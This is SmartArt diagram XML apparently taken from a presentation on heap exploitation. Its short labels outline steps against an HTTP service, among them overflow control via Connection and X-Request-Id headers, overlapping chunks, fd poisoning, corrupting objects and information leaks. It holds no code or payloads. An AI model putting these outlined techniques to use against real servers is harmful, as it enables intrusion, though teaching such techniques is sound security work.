    <dgm:cxn modelId="{95E8AD48-C7A2-4E8B-BCFB-5CA3BDBDF576}" type="presParOf" srcId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" destId="{4418884B-61B8-438C-8CD9-19403E00EBE7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{EBFFD5DB-AE67-45FE-A283-25768FD06E28}" type="presParOf" srcId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" destId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{68699073-849A-4FEF-B65E-14D4AB2256CC}" type="presParOf" srcId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" destId="{C102885D-AD41-441B-8AF8-DE058AFDB7A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{40F5092D-664D-4FCB-A753-08FC9D128D99}" type="presParOf" srcId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" destId="{4B2913E4-0101-43A5-9C50-C90938DB4DFB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{45B59910-CB0B-44BD-A40C-9332C55036AC}" type="presParOf" srcId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" destId="{5A283E68-9ED5-481E-8805-193B96B8FA7B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{2A663024-4238-44D5-854C-CB0F73B3D70C}" type="presParOf" srcId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" destId="{71CFAF0E-F629-4D86-9C84-A21BF36CE7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55780C-6F8D-4255-9DD1-4810392A30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F389213-35C6-4349-93DC-DCC636E2A0F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Towards the end of program </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F954869-7C09-41D9-AFD0-E7DF73961C14}" type="parTrans" cxnId="{55059282-1624-4300-A788-8AF2462836E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62731443-70EE-448E-9362-3B3E7CF0E158}" type="sibTrans" cxnId="{55059282-1624-4300-A788-8AF2462836E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AF67123-79AA-41ED-8854-F4DB7C605695}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Connection</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> header for another round</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{555941CD-3722-4C83-8F11-D59C03D051B6}" type="parTrans" cxnId="{E61C5D5D-804C-46A1-A085-FF6E5073B15F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFCDAD55-86CB-4EC2-BD37-94417C1B08CA}" type="sibTrans" cxnId="{E61C5D5D-804C-46A1-A085-FF6E5073B15F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Is data controlled in overflow? Yes!</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A995CA6-9EE7-43A1-A44D-06D0098887CA}" type="parTrans" cxnId="{57BFAE27-0004-48BC-9FEE-8587159DD4B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{577B869B-09A3-4BDE-B8E5-6799843C857B}" type="sibTrans" cxnId="{57BFAE27-0004-48BC-9FEE-8587159DD4B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Fully controlled size on overflow? Yes!</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{523ECD28-828F-4414-B9BE-D7F1C3118114}" type="parTrans" cxnId="{7EE52269-C642-4297-9E02-372E5A8D056D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22766A84-7DD7-4223-B372-870DD6027338}" type="sibTrans" cxnId="{7EE52269-C642-4297-9E02-372E5A8D056D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A50B4C53-0B8E-A745-8815-784B2F9F0501}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>X-Request-Id</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> header</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B5556B-2EC8-5744-927A-CF2456001600}" type="parTrans" cxnId="{A41EEF66-58E4-DA42-8B03-302393109C53}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EE16389-BF54-AB42-AE30-352E94642F3A}" type="sibTrans" cxnId="{A41EEF66-58E4-DA42-8B03-302393109C53}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" type="pres">
      <dgm:prSet presAssocID="{6455780C-6F8D-4255-9DD1-4810392A304D}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D7D5219-3153-B043-8F6F-455837EC0912}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{435EB0F3-CE16-0043-BF12-FBD3BF5072F2}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4D27442-3B5E-4041-A01F-811ED6A65763}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9E2DB808-CBA2-7244-9930-00C66C402802}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66674668-A517-5249-A4B0-42C941FE4E2C}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52715741-8929-5242-A1D9-E7E21EDA5E87}" type="pres">
      <dgm:prSet presAssocID="{62731443-70EE-448E-9362-3B3E7CF0E158}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8888F1A1-380E-6C48-B2ED-FE3CABA211FF}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C88DBD0-4DFF-3642-A179-3D6A0E72F79F}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CCC4A5B2-7D12-644A-8FDC-896B19751B9A}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{64AA9946-3208-E247-9999-B8633FFB1B5C}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B375430D-94AF-B34E-9E93-A979F7FC1FF8}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{194D062B-080E-8740-AEC0-361E2A7C021C}" type="pres">
      <dgm:prSet presAssocID="{577B869B-09A3-4BDE-B8E5-6799843C857B}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BDC325A-09E1-4144-B986-E68C3E7A67DB}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65EF1D85-1E5B-6445-8E5F-35E7B6112379}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E45272AD-1D9F-4641-9EDC-868BAD3F0E98}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA0FB776-4E36-D04B-BD3E-F6388C789B0E}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{34EB131E-ADD7-5543-9F8A-D05C6F05E011}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{37126806-E068-B945-AB02-865ECAD1192A}" type="presOf" srcId="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" destId="{435EB0F3-CE16-0043-BF12-FBD3BF5072F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{57BFAE27-0004-48BC-9FEE-8587159DD4B7}" srcId="{6455780C-6F8D-4255-9DD1-4810392A304D}" destId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" srcOrd="1" destOrd="0" parTransId="{6A995CA6-9EE7-43A1-A44D-06D0098887CA}" sibTransId="{577B869B-09A3-4BDE-B8E5-6799843C857B}"/>
    <dgm:cxn modelId="{3513182C-3EB0-7441-8202-55BAF39457EB}" type="presOf" srcId="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" destId="{E45272AD-1D9F-4641-9EDC-868BAD3F0E98}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E61C5D5D-804C-46A1-A085-FF6E5073B15F}" srcId="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" destId="{3AF67123-79AA-41ED-8854-F4DB7C605695}" srcOrd="0" destOrd="0" parTransId="{555941CD-3722-4C83-8F11-D59C03D051B6}" sibTransId="{CFCDAD55-86CB-4EC2-BD37-94417C1B08CA}"/>
    <dgm:cxn modelId="{8201B464-8CEB-2344-BC16-3EDF96A292B0}" type="presOf" srcId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" destId="{3C88DBD0-4DFF-3642-A179-3D6A0E72F79F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A41EEF66-58E4-DA42-8B03-302393109C53}" srcId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" destId="{A50B4C53-0B8E-A745-8815-784B2F9F0501}" srcOrd="0" destOrd="0" parTransId="{25B5556B-2EC8-5744-927A-CF2456001600}" sibTransId="{6EE16389-BF54-AB42-AE30-352E94642F3A}"/>
    <dgm:cxn modelId="{7EE52269-C642-4297-9E02-372E5A8D056D}" srcId="{6455780C-6F8D-4255-9DD1-4810392A304D}" destId="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" srcOrd="2" destOrd="0" parTransId="{523ECD28-828F-4414-B9BE-D7F1C3118114}" sibTransId="{22766A84-7DD7-4223-B372-870DD6027338}"/>
    <dgm:cxn modelId="{55059282-1624-4300-A788-8AF2462836E5}" srcId="{6455780C-6F8D-4255-9DD1-4810392A304D}" destId="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" srcOrd="0" destOrd="0" parTransId="{4F954869-7C09-41D9-AFD0-E7DF73961C14}" sibTransId="{62731443-70EE-448E-9362-3B3E7CF0E158}"/>
    <dgm:cxn modelId="{653E64B5-D450-704D-B8F1-1552B78770D0}" type="presOf" srcId="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" destId="{F4D27442-3B5E-4041-A01F-811ED6A65763}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{23BD0EBE-6246-FA4B-9BAE-1003779EA4AC}" type="presOf" srcId="{A50B4C53-0B8E-A745-8815-784B2F9F0501}" destId="{B375430D-94AF-B34E-9E93-A979F7FC1FF8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{188191D2-1C00-124C-82C5-9B9BA80439DD}" type="presOf" srcId="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" destId="{65EF1D85-1E5B-6445-8E5F-35E7B6112379}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A45985DF-FB9F-FF4E-AD36-CC28076B14FA}" type="presOf" srcId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" destId="{CCC4A5B2-7D12-644A-8FDC-896B19751B9A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9DA329E0-06A9-CA4F-A10C-4A88871879E5}" type="presOf" srcId="{6455780C-6F8D-4255-9DD1-4810392A304D}" destId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5D0A2CFD-3991-6B43-A395-CA8C28161240}" type="presOf" srcId="{3AF67123-79AA-41ED-8854-F4DB7C605695}" destId="{66674668-A517-5249-A4B0-42C941FE4E2C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9F7E6000-4472-854D-A267-D782C6D43E7B}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{9D7D5219-3153-B043-8F6F-455837EC0912}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B73908D7-B963-5C4F-85BA-F90159FF5D33}" type="presParOf" srcId="{9D7D5219-3153-B043-8F6F-455837EC0912}" destId="{435EB0F3-CE16-0043-BF12-FBD3BF5072F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D0928F29-60F8-7641-9EA0-E3AAEF0988D2}" type="presParOf" srcId="{9D7D5219-3153-B043-8F6F-455837EC0912}" destId="{F4D27442-3B5E-4041-A01F-811ED6A65763}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DC7BC39E-C971-E248-967E-7B9767607E27}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{9E2DB808-CBA2-7244-9930-00C66C402802}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4DC7691E-1E3C-1F43-BC03-9100B98DB643}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{66674668-A517-5249-A4B0-42C941FE4E2C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{757034D7-8CBD-E243-8457-50D9CA1BA9DF}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{52715741-8929-5242-A1D9-E7E21EDA5E87}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{63834CEE-5A06-F041-983E-244098C558B5}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{8888F1A1-380E-6C48-B2ED-FE3CABA211FF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A76CF6BC-B0A6-4545-8213-9F66B4CBA8FF}" type="presParOf" srcId="{8888F1A1-380E-6C48-B2ED-FE3CABA211FF}" destId="{3C88DBD0-4DFF-3642-A179-3D6A0E72F79F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E46E9C75-3450-FE44-86CC-44457B4C03D3}" type="presParOf" srcId="{8888F1A1-380E-6C48-B2ED-FE3CABA211FF}" destId="{CCC4A5B2-7D12-644A-8FDC-896B19751B9A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5E208057-AC33-984C-940D-6FE62AEEF946}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{64AA9946-3208-E247-9999-B8633FFB1B5C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{127E6B3E-5536-364E-B317-87D977BA1920}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{B375430D-94AF-B34E-9E93-A979F7FC1FF8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0A07C9BB-E79F-1F40-A3F6-D255B43D9628}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{194D062B-080E-8740-AEC0-361E2A7C021C}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{70047705-E591-2248-9D33-472C78F5944B}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{6BDC325A-09E1-4144-B986-E68C3E7A67DB}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{67B402C9-38A9-1F4A-8E12-770C10D9BFA2}" type="presParOf" srcId="{6BDC325A-09E1-4144-B986-E68C3E7A67DB}" destId="{65EF1D85-1E5B-6445-8E5F-35E7B6112379}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{35D1A590-101B-B94A-AAC7-C8E24B07FB5E}" type="presParOf" srcId="{6BDC325A-09E1-4144-B986-E68C3E7A67DB}" destId="{E45272AD-1D9F-4641-9EDC-868BAD3F0E98}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E4F91B96-F7ED-5249-8903-4D71B6A8BA94}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{EA0FB776-4E36-D04B-BD3E-F6388C789B0E}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DA5E1E77-67DE-7F48-8DC9-7985D8E66324}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{34EB131E-ADD7-5543-9F8A-D05C6F05E01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B67578-E72B-4CB9-9E97-9506C0946234}"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EFC6C035-55D4-4DCE-8774-26F62EEED8ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Overlapping chunks</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D2E8E50-AE0B-4791-B283-96A0276C0BFC}" type="parTrans" cxnId="{48730A1A-DA50-4A3C-95E9-49479E2DA7EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E751E930-5E16-4236-8EB9-C4DFD00F678B}" type="sibTrans" cxnId="{48730A1A-DA50-4A3C-95E9-49479E2DA7EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF880266-12B2-45EE-9D54-C76817831F7C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Fd Poison</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DA209EE-E26B-4FC6-BD9A-3987282CC8E5}" type="parTrans" cxnId="{0616C07E-6F52-44F4-B20A-B792708200A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98B4B280-2D56-4754-BD6D-5C1CF53AA000}" type="sibTrans" cxnId="{0616C07E-6F52-44F4-B20A-B792708200A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B8CB64D-0EA3-4F32-8801-C12A33586719}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Corrupt other important objects</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{084D6896-64E6-41B3-AD89-016CA37D9A66}" type="parTrans" cxnId="{52DF4B4B-43BF-41D3-B296-63C4F9A17890}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AAB31A73-FB96-423E-87B0-523B253FD503}" type="sibTrans" cxnId="{52DF4B4B-43BF-41D3-B296-63C4F9A17890}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83250952-F84C-4A6B-9812-6A443BB9A6E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Information leaks</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C59DB59B-1C13-490E-9FCF-5C8D1A4997A0}" type="parTrans" cxnId="{22601FC8-A97B-49B6-A3C4-0BFEB58C55C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AAF9BC6-396A-4C9A-BD13-9052F8AF7A93}" type="sibTrans" cxnId="{22601FC8-A97B-49B6-A3C4-0BFEB58C55C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
